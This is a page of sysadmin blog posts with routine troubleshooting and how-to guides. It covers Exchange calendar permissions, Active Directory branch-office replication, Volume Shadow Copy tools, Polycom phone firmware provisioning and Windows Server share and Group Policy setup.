# daknetworks.com

You are here:

## Outlook 2016 Calendar Sharing - "You Don't Have Permission To Create An Entry In This Folder"

Outlook 2016 Calendar Sharing - "You Don't Have Permission To Create An Entry In This Folder"

### SCENARIO

You try and share a calendar in Outlook 2016. When the person who has EDITOR accessrights adds the shared calendar to their Outlook, they get the following message:
"You Don't Have Permission To Create An Entry In This Folder...."

### RESOLUTION

There can be many reasons why this is happening. Ultimately it is a permission issue or a cache permission issue.

#### 1-check to see if the calendar has the correct permissions.

Show Calendar Permissions
Get-MailboxFolderPermission foo.user:\calendar

Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor

The non-working mailbox calendar has the correct permissions and it still doesn't work.

#### 2-temporarily change the primary smtp address on the shared account.

Don't ask me why but I've witnessed that if the shared account ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it ) changes the primary smtp email address domain ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it ) sometimes the person trying to access the calendar can suddenly edit the calendar if they remove the calendar and add it back in. Here's how...

On OUTLOOK where you are trying to access the shared calendar:
-click CALENDAR (bottom-left).
-find OTHER CALENDARS.
-right-click on the calendar-name.
-click DELETE CALENDAR (don't worry, this only removes the calendar. It doesn't actually delete the calendar).
-close OUTLOOK.

-change primary smtp via ECP (web interface) from This e-mail address is being protected from spambots. You need JavaScript enabled to view it to: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

-open OUTLOOK.

-click CALENDAR (bottom-left).
-find OTHER CALENDARS.
-right-click OTHER CALENDARS > ADD CALENDAR > OPEN SHARED CALENDAR.
-type in the name of the person.
-click OK.

WORKS WITH NEW DOMAIN!!! And can edit the calendar.

-remove the shared calendar (same as above).

-change primary smtp via ECP (web interface)from This e-mail address is being protected from spambots. You need JavaScript enabled to view it to: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

WORKS WITH ORIGINAL DOMAIN!!! And can edit the calendar.

It is important to note that changing via Exchange Management Shell (EMS) did not work and resulted in the original error.

$Set-Mailbox foo.user -PrimarySmtpAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it$Add-MailboxFolderPermission foo.user:\calendar -User foo.user2

I'm not sure if this is an emailaddresses issue. Or a missing value in one of the keys that is changed in the ECP and not in the EMS. Or if it is a global-address cache issue. Or if it a GAL sync issue that takes time. All I can tell you is that I performed the steps above and it worked. Took me a good 30 hours or so to figure that out.

In any event, I checked the following but nothing produced any meaningful results concerning this issue:
$Get-mailboxpermission foo.user |fl$Get-Mailbox foo.user| Select-Object -ExpandProperty EmailAddresses
$Get-CalendarProcessing foo.user |fl$Get-CASmailbox foo.user| fl

#### 3-check the offlineaddressbook setting for the mailboxdatabase

Somewhere along the line during initial install, a CU update or creation of a new mailboxdatabase, the OFFLINEADDRESS book key is blank/null. I think it would automatically default to the default address book but I really don't know. I haven't found any info that says have a null value is bad but most info I see says to set it for all mailboxdatabases.

Find the name of the OFFLINE ADDRESS BOOK:

Now set the MAILBOXDATABASE to use that name:

### NOTES

Calendar Permissions can be set individually or by role. The DEFAULT permissions are:
ReadItems, CreateItems, EditOwnedItems, EditAllItems, CreateSubfolders, FolderVisible

Or another way to view the DEFAULT role is like this (the minus is what the role doesn't have):
CreateItems
EditOwnedItems
EditAllItems
CreateSubfolders
FolderVisible
-DeleteOwnedItems
-DeleteAllItems
-FolderOwner
-FolderContact

The EDITOR role permissions are:
ReadItems, CreateItems, EditOwnedItems, EditAllItems, FolderVisible, DeleteOwnedItems, DeleteAllItems

Or another way to view the EDITOR role is like this (the minus is what the role doesn't have):
CreateItems
EditOwnedItems
EditAllItems
-createsubfolders
FolderVisible
DeleteOwnedItems
DeleteAllItems
-FolderOwner
-FolderContact

#### GET PERMISSION TO MAILBOX

Sometimes getting the permissions to the mailbox helps:
Get-MailboxPermission foo.user

#### GET PERMISSION TO MAILBOX THAT IS ANOTHER USER

Sometimes it helps to see who else has permission to the mailbox:
Get-MailboxPermission foo.user |? {$_.IsInherited -ne "true" -and$_.User -ne "NT AUTHORITY\SELF"}

Another way is:
get-mailboxpermission foo.user |where { ($_.IsInherited -eq$false) -and -not ($_.User -like “NT AUTHORITY\SELF”) } |select user,accessrights,deny,inheritancetype Which is the same as: Get-MailboxPermission foo.user |? {$_.IsInherited -eq "$false -and$_.User -ne "NT AUTHORITY\SELF"} |select user,accessrights,deny,inheritancetype

#### CHANGE PERMISSION TO MAILBOX

Sometimes you need to change permissions on the mailbox:
Set-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

Add-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

#### REMOVE PERMISSION TO MAILBOX

remove-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

#### SEE COMPLETE FOLDER STRUCTURE

Sometimes, seeing the complete folder structure of the mailbox helps:
get-MailboxFolder foo.user:\ -recurse

#### GET THE CALENDAR NAME

Sometimes getting the calendar name helps because it is changed from another language:
Get-MailboxFolderStatistics foo.user |where-object { $_.FolderType -eq "Calendar" } |select-Object Name #### ADD CALENDAR FOLDER PERMISSIONS Sometimes you need to add permissions to the calendar: Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor #### REMOVE CALENDAR FOLDER PERMISSIONS Sometimes you need to remove permissions to the calendar: remove-MailboxFolderPermission -Identity foo.user:\calendar -User foo.user2 #### SEE MAILBOXES IN ORGANIZATIONAL UNIT Sometimes you need to see the email in a single AD OU: get-mailbox -OrganizationalUnit "ou=where-ever,ou=whatever-users,dc=domain,dc=tld" -resultsize unlimited |get-mailboxstatistics |ft DisplayName,TotalItemSize,Itemcount #### REMOVE CACHE SHARED CALENDAR FOLDERS IN OUTLOOK 2016: Sometimes working off of cached shared calendar folders causes an issue and you need to remove the cache folders from OUTLOOK 2016: -account-settings > email > change > more-settings > advanced -uncheck "Download Shard Folders" -restart OUTLOOK #### REMOVE CACHE FOLDERS IN OUTLOOK 2016: Sometimes working off of cached folders causes an issue and you need to remove all the cache folders from OUTLOOK 2016: -account-settings > email > change -uncheck "Use Cached Exchange Mode" -click NEXT > FINISHED -restart OUTLOOK ## Windows Server 2012 Connect Branch Office to HQ Domain And Replicate Domain And Replicate DNS Windows Server 2012 Connect Branch Office to HQ Domain And Replicate Domain And Replicate DNS I had new 10K server and wanted to test out before making changes. The goal is to turn it into a VM. Test out connecting to the HQ domain and replicate the domain and dns. In this situation the branch office already had a domain. The location was purchased by HQ and needed to roll into the HQ domain. Couple of notes before we begin: -keep your domain flat. If you can, do NOT do subdomains, trusts, etc. It's too much of a pain later on. Keep it simple. -you can have 2 domains on the same network (just not 2 DHCP servers). ### CREATE VIRTUAL MACHINE HYPER-V is included in WINDOWS-10. So all we have to do is create a new VHDX from the existing SDD that came with the server. -connect SDD to WINDOWS-10 via USB caddy. -download DISK2VHD. -created server-2012r2 vm with DISK2VHD (you only need the main partition). -started HYPER-V -created new VM (do not import, etc). -attached newly created VHDX, no-network, 4 processors, 10GB ram. -booted for first time. -installed dns, ad, file. -shutdown. -create VSWITCH external-network & allow-management-operating-system-to-share-this-network-adapter (no vlan id). -attached VSWITCH to VM. ### ADD BRANCH OFFICE TO DOMAIN -on hq ad server: ad-sites-services > create-new-site-for-branch-office -on hq ad server: ad-sites-services > subnets > create subnets-for-branch-office & attach to branch-office -on hq ad server: ad-sites-services > inter-site-transports > ip > create new > hq/branch > 15 mins ### JOIN BRANCH OFFICE SERVER TO HQ DOMAIN Simple enough but if you've never done it before you might be thinking there's something more to it. There isn't. -start VM -change ip address to static-ip -change dns to dns at hq -join domain -restart ### PROMOTE BRANCH OFFICE SERVER AS DOMAIN CONTROLLER -click MANAGE > ADD-ROLES-AND-FEATURES -click NEXT > NEXT > NEXT -click ACTIVE-DIRECTORY-DOMAIN-SERVICES -let it go through its setup. -click promote to DOMAIN-CONTROLLER (upper-right flag) -select ADD-A-DOMAIN-CONTROLLER-TO-AN-EXISTING-DOMAIN -select DNS SERVER & GC (global catalog) -create DRSM password. -except defaults until INSTALL. -click INSTALL -wait -server reboots ### REPLICATE BRANCH OFFICE SERVER DOMAIN CONTROLLER -check USERS&COMPUTERS to see if in DOMAIN-CONTROLLERS -check SITES&SERVICES -view all servers are correct. -click NTDS SETTINGS -right-click right-panel -click REPLICATE-NOW -cycle through all NTDS SETTINGS -right-click NTDS-SETTINGS > ALL-TASKS > CHECK-REPLICATION-TOPOLOGY -cycle through all NTDS SETTINGS -ps-type: repadmin /replsummary (on the new server, the largest delta is 'unknown') -click NTDS SETTINGS -right-click right-panel -click REPLICATE-NOW -ps-type: repadmin /replsummary (on the new server, notice the time is now a few seconds) High-five!!! NOTES: thai-mswindows (youtube) ## CTS2600 I have a storage array with 12 3.5" drives. It's a little older but it works. It has an LSI sticker on it. I pop in some hard drives, plug in the Ethernet connection and power it on. Now, how do I control it? There is no monitor connection. So, I look at the DHCP find the ip address. I put the ip address in the browser but nothing shows. With a tool, I see that it is showing as a NETAPP device. Hmmm... I thought it was LSI but OK. I do a little googling and find that NETAPP purchased the storage array division from LSI. So I go to the NETAPP (who acquired LSI) web site for support. I see that it needs a program called SANTRCITY. SANTRICITY isn't offered as a free download, I have to register for it. No problem. I register for the support site and try to download it. No go. I'm "unauthorized" for that download. No problem. I provide the SERIAL-NUMBER on the device and wait. I receive a message from NETAPP stating that they won't provide support since they made it for someone else who branded it as their own. Also known as an OEM. It even states in their LSI acquire document: http://mysupport.netapp.com/NOW/public/apbu/oemcp/NetApp_Engenio_Support_Integration_FAQ.pdf But who is the OEM? I don't know. There are no markings on the device. This OEM is supposed to provide SANTRICITY or a rebrand of the app to control the storage device. I find out that the device is actually an LSI CTS2600. The LSI CTS2600 was made for DELL as the POWERVAULT MD3200. I download the DELL software but it doesn't find the array that is booted. I try a couple more times without success. I finally hear back from NETAPP that the OEM is BLUEARC. Great! A little more googling and I see that it is a BlueArc Mercury 50. BLUEARC was purchased by HITACHI. Humph... Siging up for the access to Hitachi support web site. The BLUEARC software was incorporated into HITACHI COMMAND SUITE. https://support.hds.com/en_us/user/downloads/ is empty. So I emailed support. Support writes back that there is no support contract on the device so they will not provide any help. Now I have a 20K SAN that boots and physically works but I have no way to control it or manage it. In other words, I have a 20K boat anchor. Good thing there are FTP sites with admins that don't lock them up :-) ## System Volume Information Folder Size If you are "missing" free space, and only have a few GB left when you should have many GB left (or TB), the culprit could likely be: • -permission issue. You cannot see the size of a folder if you do not have read permissions to access the folder. • -SHADOW COPIES. You can see if there are SHADOWS by following the instructions in the previous post. One item that VSSADMIN and DISKSHADOW will not show is the size of the SHADOW. Bummer. The Windows OS saves these SHADOWS in the SYSTEM VOLUME INFORMATION folder. For various reasons, a typical administrator does not have permissions to that folder. This causes an issue because you cannot know the size of the folder through EXPLORER. So how do you know the size of the SYSTEM VOLUME INFORMATION folder? Here's how using robocopy: • robocopy "c:\System Volume Information" c:\dummy /l /xj /e /nfl /ndl /njh /r:0 /b For most other items, WINDIRSTAT will show you the way. ## DISKSHADOW And VSSADMIN DISKSHADOW And VSSADMIN control shadows. But what's a "shadow"? Good question. A shadow is copy of file or a volume. This can be done even while the file is in use. The proper name for this is Volume Snapshot Service or Volume Shadow Copy Service or VSS. And it works at a block level (rather than a file level). There are a couple of parts to this but the heart of the technology is the VOLUME SHADOW COPY SERVICE which performs the actual copy. The transfer of the data is called a PROVIDER. While Windows comes with its own PROVIDER, other software companies can create their own providers. An example of a built-in PROVIDER is SYSTEM RESTORE or PREVIOUS VERSIONS for a file or folder. An example of an outside software company is SHADOWPROTECT. While SHADOWPROTECT is an outside company, it still relies on VSS to create the shadow on its behalf. SHADOWPROTECT does not create its own shadow. The shadows are traditionally managed by VSSADMIN. Here's how to show all PROVIDERS in either powershell or command-line: • vssadmin list providers And here's how to show the SHADOWS: • vssadmin list shadows And here's how to show the SHADOW storage: • vssadmin list shadowstorage VSSADMIN is not the only tool. Another tool gives more info. That is DISKSHADOW. DISKSHADOW is a interactive command interpreter like DISKPART. What I've found is that DISKSHADOW is a more accurate and more powerful tool. Here's how to enter DISKSHADOW interactive: • DISKSHADOW Here's how to show all PROVIDERS: • DISKSHADOW> list providers Here's how to show all SHADOWS: • DISKSHADOW> list shadows all It will show all the SHADOWS, if it is created for a builtin provider or for an 3rd party provider. And it will show the provider ID for each shadow. To add info, you should be able to limit the size of a shadow: • -computer-management • -right-click SHARD-FOLDER (on the left-hand side) • -click ALL-TASK > CONFIGURE-SHADOW-COPIES • -click SETTINGS for each drive and adjust the size as you see fit. NOTE: you can also do this on the DISK-MANAGEMENT snap-in. ## Upgrading Polycom Phones Across Entire Location [NOTE: please read entire document before proceeding.] Upgrading all the Polycom phones across an entire location has been a mission. Again, there's so much mis-information and different setups it is hard to weed through it all. In short, you need first provision the phones. Secondly, you need to update the firmware and software. In older Polycom phones, called SoundPoint phones, you need 2 files uploaded to your phone-server for each model of phone-set. The 2 files are: • the bootrom/bootloader/updater file. • the sip/uc-software/application (sip.ld) file. In newer Polycom phone, called VVX phones, the bootrom/bootloader/updater file is automatically included in the sip/uc-software/application (sip.ld) file. ### STAGE 1: Provision Polycom Phones Polycom phones can boot with power or POE (hint, use POE). Without a configuration, they won't do anything except complain. Configurations are great because they determine nearly everything on the phone. You can set phone call features, backgrounds and even speakerphone volume. In fact, you can set just about everything. The configuration can be kept in one of the following locations: • phone: settings set by the buttons on the phone. • web: settings set by the web interface. • server: central server that provides the configuration. We are interested in large deployments, so we will focus on central server deployments. This is important because the configuration of the setup is usually more than just the phone server and attention is needed elsewhere. If your phone are getting configurations and you don't see them in the phone set or on the phone server, the the DHCP server is where to look. Central server deployments can serve the configuration files through: • FTP • TFTP • HTTP/HTTPS Most deployments will use FTP since it can be setup everywhere; meaning inside the office and outside the office. On the other hand, TFTP will only be available inside the office. Upon booting, phones will naturally try to get an IP address from a DHCP server. When they talk to the DHCP server, the server can respond with some options to tell the Polycom phones where to look for the configuration files. The options are: • OPTION-066: this is a typical TFTP server option. However, it may already be in use by something else so Polycom had to put in a higher priority option customized just for Polycom phones. • OPTION-160: this is a Polycom specific TFTP server option. Polycom phones are hard-coded to look for this option first. This will have to be added as an option on a MS DHCP server. To add the option to MS DHCP: • -start the DHCP server-manager • -right-click IPV4 or IPV6 (on the left-hand side). • -click SET-PREDEFINED-OPTIONS • -click ADD • -type: NAME: Polycom Boot Server Name DATA: String CODE: 160 DESCRIPTION: doesn't-matter To add the OPTION-160 to the DHCP scope: This is the secret sauce and test it out before roll-out on large deployments by rebooting just one phone. This will set the value on the phone. If the value is set incorrectly and is unable to find the central-server, the phone will not be able to obtain the configuration files and will use the cached configuration. The only way I know to clear the cache is to login to the web interface: • -click UTILITIES > SOFTWARE-UPGRADE • -click CLEAR-UPGRADE-SERVER If that doesn't work, factory default the phone. This can be harder than it sounds. • -hold 1-3-5; type in 456 or type in the macaddress from the bottom of the phone (001122334455) • -press HOME > SETTINGS > ADVANCED > ADMINISTRATOR-SETTINGS > RESET-TO-DEFAULTS > RESET-LOCAL-CONFIG • (wipes macaddress-phone.cfg from server) • -press HOME > SETTINGS > ADVANCED > ADMINISTRATOR-SETTINGS > RESET-TO-DEFAULTS > RESET-WEB-CONFIG (wipes macaddress-web.cfg from server) • -press HOME > SETTINGS > ADVANCED > ADMINISTRATOR-SETTINGS > RESET-TO-DEFAULTS > RESET-TO-FACTORY (wipes all configuration containers on the device) • -press HOME > SETTINGS > ADVANCED > ADMINISTRATOR-SETTINGS > RESET-TO-DEFAULTS > FORMAT-FILE-SYSTEM (wipes app from phone and will require provisioning server to work again) You can see if the provisioning worked by looking at the phone: • -press HOME > SETTINGS > STATUS > PLATFORM > CONFIGURATION • -see the boot server, boot type and configuration files. ### STAGE 2: THE BOOTROM/UPLOADER 1-First, download the BOOTLOADER/BOOTROM/UPDATER files here for the SOUNDPOINT phones (the VVX phones have thier BOOTROM/UPDATER included in the sip.ld file): http://downloads.polycom.com/voice/voip/uc/SoundPoint_IP_BootROM_4_4_0_Upgrader_release_sig.zip (or if you have a SoundStation 6000/7000, you need the B version here: http://downloads.polycom.com/voice/voip/uc/SoundPoint_IP_BootROM_4_4_0B_Upgrader_release_sig.zip) 2-unzip the download and inside the folder you will see the bootloader files like: 2345-12560-001.bootrom.ld 3-Take all the BOOTROM files and upload them to your phone-server (provisioning server) in the tftpboot directory. (fyi - the tftpboot directory will be at the root of the filesystem: /tftpboot.) The chart below will show what bootrom goes with what phone-set model.  FILES DESCRIPTION bootrom.ld Concatenated BootROM 2345-12345-001.bootrom.ld ????? (Probably SoundPoint IP 300/302/320/330) 2345-12360-001.bootrom.ld SoundPoint IP 321 2345-12365-001.bootrom.ld SoundPoint IP 331 2345-12375-001.bootrom.ld SoundPoint IP 335 2345-12450-001.bootrom.ld SoundPoint IP 450 2345-12500-001.bootrom.ld SoundPoint IP 550 2345-12560-001.bootrom.ld SoundPoint IP 560 2345-12600-001.bootrom.ld SoundPoint IP 650 2345-12670-001.bootrom.ld SoundPoint IP 670 2345-17960-001.sip.ld VVX 1500 3111-15600-001.bootrom.ld SoundStation IP 6000 3111-17823-001.dect.ld VVX D60 Wireless Handset & Base Station 3111-19000-001.sip.ld SoundStation Duo 3111-30900-001.bootrom.ld SoundStation IP 5000 3111-33215-001.sip.ld SoundStructure 3111-36150-001.sip.ld SpectraLink 8440 3111-36152-001.sip.ld SpectraLink 8450 3111-36154-001.sip.ld SpectraLink 8452 3111-40000-001.bootrom.ld SoundStation IP 7000 3111-40250-001.sip.ld VVX 101 3111-40450-001.sip.ld VVX 201 3111-44500-001.sip.ld VVX 500 3111-44600-001.sip.ld VVX 600 3111-46135-002.sip.ld VVX 300 3111-46161-001.sip.ld VVX 310 3111-46157-002.sip.ld VVX 400 3111-46162-001.sip.ld VVX 410 3111-48300-001.sip.ld VVX 301 3111-48350-001.sip.ld VVX 311 3111-48400-001.sip.ld VVX 401 3111-48450-001.sip.ld VVX 411 3111-48500-001.sip.ld VVX 501 3111-48600-001.sip.ld VVX 601 3111-48810-001.sip.ld VVX 150 3111-48820-001.sip.ld VVX 250 3111-48830-001.sip.ld VVX 350 3111-48840-001.sip.ld VVX 450 Great! You are halfway there. ### STAGE 3: THE SIP.LD FILE aka POLYCOM-UC-SOFTWARE aka APPLICATION) The SIP.LD file is the image that will be served by the TFTP/FTP central server. This is the same as the APPLICATION VERSION or the SIP APPLICATION VERSION. 1-First, look at the Polycom Matrix for older phones (ie SOUNDPOINT/SOUNDSTATION phones) here: http://downloads.polycom.com/voice/voip/sip_sw_releases_matrix.html Or the Polycom Matrix for newer phones (ie VVX phones) here: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html 2-Second, download the most recent version of the firmware (get the SPLIT-DOWNLOAD [not combined-download]). There are many options here but they should be boiled down to either "Current GA for Microsoft Lync" or "Current GA Release" (Hopefully it's obvious, the MS Lync is for MS Lync servers. If you do not know what that is, don't worry about it as it is not the one you need). (As of this writing the Current General Availability for SOUNDPOINT phone-sets is v4.0.11). 3-unzip the download and inside the folder, you will see SIP.LD files like: 2345-12560-001.sip.ld 4-Take all the LD files and upload them to your phone-server (provisioning server) in the tftpboot directory. Overwrite any files that are currently there (even if they are from the bootrom zip from above). [This process is easier than figuring out if we need the files or not. Having everything will not hurt anything.] 5-Once there, rename the file according to your system. Use the guide above as direction. I had to rename the files as such: sip.SPIP560.4.0.11.revc.ld sip.VVX410.5.7.0.revc.ld ### STAGE 4: CONFIG FILES ----------From here, there might be some troubleshooting. Namely, some of the old config files may not work with the most recent firmware. Edit the files accordingly in the tftpboot directory. Each phone will have a MAC-address number on the back. Something like, 0004123EDT78. So, each phone will have a base-config file of mac-number.cfg. Something like, 0004123EDT78.cfg The phones are hard coded to look for this file. The first part of the file will dictate that SIP.LD/APPLICATON file. It will look like this: APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].3.2.3.revc.ld" With our directory structure in place, we can have the same model of phones use different APPLICATION versions at the same time. And we can have different models of phones use different APPLICATION versions at the same time. All of this is done by changing the base-config file. This file will determine what SIP.LD file to use and what further config files to use. Before the update, the contents will look something like this: <APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].3.2.3.revc.ld" CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.3.2.3.revc.cfg" MISC_FILES="0004123EDT78-directory.xml" LOG_FILE_DIRECTORY="" OVERRIDES_DIRECTORY="" CONTACTS_DIRECTORY="" LICENSE_DIRECTORY=""> </APPLICATION> After the update, you need to edit the file to look something like this: <APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].4.0.11.revc.ld" CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.4.0.11.revc.cfg" MISC_FILES="0004123EDT78-directory.xml" LOG_FILE_DIRECTORY="" OVERRIDES_DIRECTORY="" CONTACTS_DIRECTORY="" LICENSE_DIRECTORY=""> </APPLICATION> You can do this file-by-file if needed. Or you can run one command on the phone-server. 1-make sure you are in the tftpboot directory 2-make a directory for the backup of the files: mkdir cfgfiles 3-copy all the base config files into this directory: cp ./000*.cfg ./cfgfiles (or cp ./6416*.cfg ./cfgfiles) 4-change all the files at once: sed -i -e "s/3.2.3.revc.ld/4.0.11.revc.ld/g" ./000*.cfg This will update all the base-config files to tell the phone-sets to use the new SIP.LD/APPLICATION files. #### PHONE OVERRIDE FILES Phone override files are changes made from the phone-set and are named <MAC Address>-phone.cfg. So something like, 0004123EDT78-phone.cfg On my phone-server, the older phone override files were named phone-0004123EDT78.cfg If they have parameters older than v3.3.0, you will get an error message. To fix, see below in the "UPDATE CONFIG FILE WITH UTILITY" section. #### WEB OVERRIDE FILES If you change something via the phone-set web interface, it will save the settings in a web-override file named <MAC Address>-web.cfg. So something like, 0004123EDT78-web.cfg ### STAGE 5: REBOOT Now reboot the phone. It should upgrade the bootrom automatically. You do not need to do anything as the phone is hard coded to look for and use the newest bootrom available. After the bootrom is updated, the application/sip.ld will update. This process may take around 10 minutes per phone. If you have a POE switch, you can do this across the network by unplugging the POE switch. Wait about 1 minute. Plug the POE switch back in. Then wait about 15 minutes for all the phone to upgrade. (Of course, wait for after hours time period.) ### STAGE 6: UPDATE CONFIG FILE WITH UTILITY If you have an older config file, the Polycom phone-set will give an error. Something like, "phone-0004123EDT78.cfg is pre-3.3.0 params." Basically it is saying that you are trying to config a parameter that doesn't exist. You can see what config files are being used and which have errors by: • -press HOME > SETTINGS > STATUS > PLATFORM > CONFIGURATION scroll down on the phone and it will show the number of PRE-3.3.0, ERRORS, DUPLICATES and OK's. Consequently, you will have to update your config files to remove those parameters.This can be done parameter-by-parameter by looking at the log file on the phone (or server) and manually adjusting for each. Or you can do this automatically with a Windows software utility called: CFCUtility. Your results may vary so be careful with the utility. • -download it here: http://support.polycom.com/PolycomService/support/us/support/eula/ucs/UCConfig_agreement.html • -unzip. • -in the CFCUtiliy folder, create a folder called "config-files". • -on the central-server, make sure you are in the tftpboot directory. • -make a backup directory: mkdir cfgphonefiles • -copy all the phone files to this directory (as a backup for safe keeping): cp ./*cfg ./cfgphonefiles/ • -gather all the config-files in the folder called "config-files". (this can be done by mounting usb drive, ftp, scp, etc) • -from a Windows command-line change to the CFCUtiliy folder. • -type: cfcUtility.exe -t ./config-files • -it will ask you some generic questions and accept the defaults. Now you can transfer the files back to the phone-server in the tftpboot directory. • -reboot the phone(s). (remember, if you have a POE switch unplug the switch and plug back in for a network-wide solution) • -it will reboot 2 or 3 times on it's own. ### UNCOMPLICATING CONFIG FILES All the configuration for the phones can be done in one config file if we really wanted to. Or we could have one really long config file for each phone. But for sanity's sake, we break this out. In the tftpboot directory, you will have some files for each phone-set: 0004123EDT78.cfg (the base config. The backup is in the cfgfiles directory) 0004123EDT78-phone.cfg (the new phone override, used automatically) 0004123EDT78-web.cfg (the new web override, used automatically) phone-0004123EDT78.cfg (the old phone override, used by the base-config file. This file is converted and a backup is in the cfgphonefiles directory. It can be deleted since it is not being used.) Other config files can be present as well (but not required). In the unzip folder of the Polycom UC Software from STAGE-3, you can find the generic config files: applications.cfg dect.cfg device.cfg features.cfg firewall-nat.cfg H323.cfg lync.cfg pstn.cfg reg-advanced.cfg reg-basic.cfg region.cfg sip-basic.cfg sip-interop.cfg site.cfg tr069.cfg video.cfg video-integration.cfg Each has it's own place in life. I usually see: 64167f920093-reg-basic.cfg (for the line registration) 64167f920093-features.cfg (for the features of the phone) polycom.UC5.7.0.sip-basic-11325.cfg (for the line registration of the location) polycom.UC5.7.0.device-11325.cfg (for device settings for the location) polycom.UC5.7.0.sip-interop-11325.cfg (for interoffice operation settings) polycom.UC5.7.0.site-11325.cfg (for site settings like timezone) You can see the entire list of options/values by inspecting the 73,000 line file in the unzip download: Polycom-UC-Software-5-7-0-rts18-release-sig-split\Config\polycomConfig.xsd #### FOR NEWER FIRMWARE VERSIONS, SINGLE PHONE For newer phone-sets with updated firmware versions, simply redirect the provisioning server to: voipt2.polycom.com/<version-number> 1. go to phone 2. press Menu > Settings > Advanced (default password: 456) > Administration Settings > Network Configuration > Provisioning-Server 3. change Server Type to HTTP. 4. type: voipt2.polycom.com (for Server Address) • Example: to load the latest SIP 4.04 = voipt2.polycom.com/404 • Example: to load the latest SIP 4.0.11 = voipt2.polycom.com/4011 5. reboot the phone-set 6. wait 15 minutes 7. once updated, change the server back to the local provisioning-server For a current live directory list go here: http://voipt2.polycom.com/WEBCONTENT/directory.html NOTES: -the config files are explained here: http://documents.polycom.com/topics/139356 ## Update the ADMX Templates in Windows Server to Apply GPO to Windows 10 Updating the ADMX Templates in Windows Server to Apply GPO to Windows 10 is a manual process. A Windows Server can control Windows client computers through Group Policy/Group Policy Objects (GP/GPO). It does this through template files called ADMX files. These ADMX files simply correspond to registry-edits (regedits). Since not all regedits are available on OS versions (for example, controlling OneDrive was included along the way), there is a set of ADMX files for common milestones like: • -Windows 7 • -Windows 7 SP1 • -Windows 8 • -Windows 8.1 • -Windows 10 • -Windows 10 (1511) • -Windows 10 (1607) Anniversary Update The ADMX files are not automatically updated on the Windows Server. They must be manually updated. The updates are in MSI files (and not zipped files). The instructions are pretty simple once someone shows you: • -download the ADMX msi. • -install the ADMX msi (this will unpack the ADMX files in a folder called "Policy Definitions"). • -copy the entire contents to: C:\Windows\SYSVOL\sysvol\domain-name\Policies\PolicyDefinitions\ You can find the ADMX files here: -Windows 10 (1511) https://www.microsoft.com/en-us/download/details.aspx?id=48257 -Windows 10 (1607) Anniversary Update https://www.microsoft.com/en-us/download/details.aspx?id=53430 -Windows 10 (1703) https://www.microsoft.com/en-us/download/details.aspx?id=55080 -Windows 10 (1709) https://www.microsoft.com/en-us/download/details.aspx?id=56121 -Windows 10 (1803) https://www.microsoft.com/en-us/download/details.aspx?id=56880 Or in any Windows 10 client: C:\Windows\PolicyDefinitions Be careful taking the ones installed in a client OS and putting them on a Domain controller that manages multiple OS's. It can be dangerous because they often can have different settings, different ADMX names and can be missing settings for supporting previous versions of the OS. This video explains it better than I can: NOTES: • adm files are older. • admx files are newer. • adml files are xml translation/localization files. ## Creating Shares On Server 2012 Many experience admins get this wrong. Here's how to do it right. There are a 5 parts to this. CREATE THE GROUP • -login to server. • -click ACTIVE-DIRECTORY-USERS-AND-COMPUTERS. • -create an GROUP (aka SECURITY-GROUP). • -add the users/members. CREATE THE SHARE • -create a folder. • -right-click to PROPERTIES > SHARING. • -click ADVANCED-SHARING. • -checkmark SHARE-THIS-FOLDER. • -if hidden, add a$ at the end.

• -click PERMISSIONS.
• -remove all groups/users.
• -add the GROUP required for this share.
• -checkmark FULL-CONTROL.
• -click OK > OK.

• -click SECURITY tab (at the top).
• -click ADVANCED (at the bottom).
• -click DISABLE ENHERITANCE.
• -click CONVERT INHERITED PERMISSIONS INTO EXPLICIT PERMISSIONS.
• -remove all groups/users except SYSTEM.
• -add the GROUP required for this share.
• -checkmark FULL-CONTROL.
• -click OK > APPLY.

TEST PERMISSIONS

• -click the EFFECTIVE ACCESS tab (at the top).
• -test the user/group you want to make sure can access.

NOTES:

• -the EVERYONE group does not include everyone. This is why it should not be used.
• -the most restrictive permissions win.
• -the group is assigned to the user upon login. Consequently, the user will have to logout and login again to test if the share is working.

## Find the FSMO in Your Domain

You have multiple servers. Despite there being a sync between them, only one can be the master for certain operations. For example, only one server can hold the official invitation list. The other bouncers will have to check the master list. This master is called the FSMO.

So how do you know which server is the FSMO? How do you find the FSMO in your domain?

Here's how:

• open cmd
• type: netdom query fsmo

You can also:

• -open ACTIVE-DIRECTORY-USERS-AND-COMPUTERS.
• -right-click on the domain-name (on the left-hand side).
• -click OPERATIONS MASTER.
• -it should show you there as well. At the different tabs at the top, you can select which OPERATION you are interested in.

There are other ways as well.

## Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update)

Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update) upon reboot. The only way to get out of it is to power down the computer. Upon reboot, the computer will revert to the previous version of Windows 10 v1511.

So how to get Windows 10 v1607 Update (aka Anniversary Update) to install?

-start the update.
-manually reboot to finish.
-before it reboots, unplug the USB dongle for the Logitech wireless mouse or wireless keyboard.
-the update will install.

## Intel HD Graphics on Windows 10 64-bit

In the spirit of "just show me how to fix it" I will be succinct.

The older Intel HD Graphics 3000 (or Sandy Bridge) is no longer working in WINDOWS-10(v1607). It used to work in WINDOWS-10(v1511) but INTEL is pushing foreword. The same is true for Intel HD Graphics 2000 and HD Graphics. This is basically the Intel 6 Generation Chipset.

-Intel refuses to produce drivers for this graphics card on it's own but has released a driver and provided it to MS.
-the driver is version 9.17.10.4459.
-the driver has to be gotten from MS and not from INTEL:
http://catalog.update.microsoft.com/v7/site/Search.aspx?q=9.17.10.4459
(it is named: 200028694_9f1eae50bc588760715acd70172f5487dc461e64)

CASE-1
-INTEL GRAPHICS HD 3000
